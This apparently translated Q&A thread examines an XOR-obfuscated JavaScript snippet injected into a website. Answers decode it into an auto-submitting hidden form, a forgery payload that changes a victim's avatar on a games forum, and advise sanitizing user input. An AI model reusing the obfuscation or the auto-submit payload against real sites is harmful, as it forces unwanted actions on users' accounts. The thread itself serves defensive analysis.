这里是:
<script language="javascript">
var enkripsi="'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1@'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5@'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
</script>
答案 0 :(得分:8)
清理代码会导致
var enkripsi = "'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1@'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5@'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G";
teks = "";
teksasli = "";
var panjang;
panjang = enkripsi.length;
for (i = 0; i < panjang; i++) {
teks += String.fromCharCode(enkripsi.charCodeAt(i) ^ 2)
}
teksasli = unescape(teks);
document.write(teksasli);
将document.write更改为console.log。把它放进萤火虫中就可以了。
<body onLoad="submit_form();">
<form name="myform" action="http://forum.jogos.uol.com.br/dwr/exec/UserFunctions.updateUserAvatar.dwr" method="POST">
<input type="hidden" name="callCount" value="1">
<input type="hidden" name="c0-scriptName" value="UserFunctions">
<input type="hidden" name="c0-methodName" value="updateUserAvatar">
<input type="hidden" name="c0-id" value="5877_1317262737173">
<input type="hidden" name="c0-param0" value="string:5099">
<input type="hidden" name="xml" value="true">
Please click here: <input type="submit" value="Continue..." />
</p>
</form>
<script language="javascript">
<!-- function submit_form() { document.myform.submit() } -->
</script>
这里真正的问题是用户如何将代码注入您的网站。他们是否将其输入表单并且您只是输出他们输入的内容,或者它是您正在使用的软件中的错误?
如果是软件中的错误,请升级。
如果是您的代码,您需要学习如何清理用户输入。 OWASP has great info
答案 1 :(得分:0)
以下是经过反混淆的JavaScript代码:
<body onLoad="submit_form();">
<form name="myform" action="http://forum.jogos.uol.com.br/dwr/exec/UserFunctions.updateUserAvatar.dwr" method="POST">
<input type="hidden" name="callCount" value="1">
<input type="hidden" name="c0-scriptName" value="UserFunctions">
<input type="hidden" name="c0-methodName" value="updateUserAvatar">
<input type="hidden" name="c0-id" value="5877_1317262737173">
<input type="hidden" name="c0-param0" value="string:5099">
<input type="hidden" name="xml" value="true">
Please click here: <input type="submit" value="Continue..." /></p>
</form>
<script language="javascript">
<!--
function submit_form()
{
document.myform.submit()
}
-->
</script>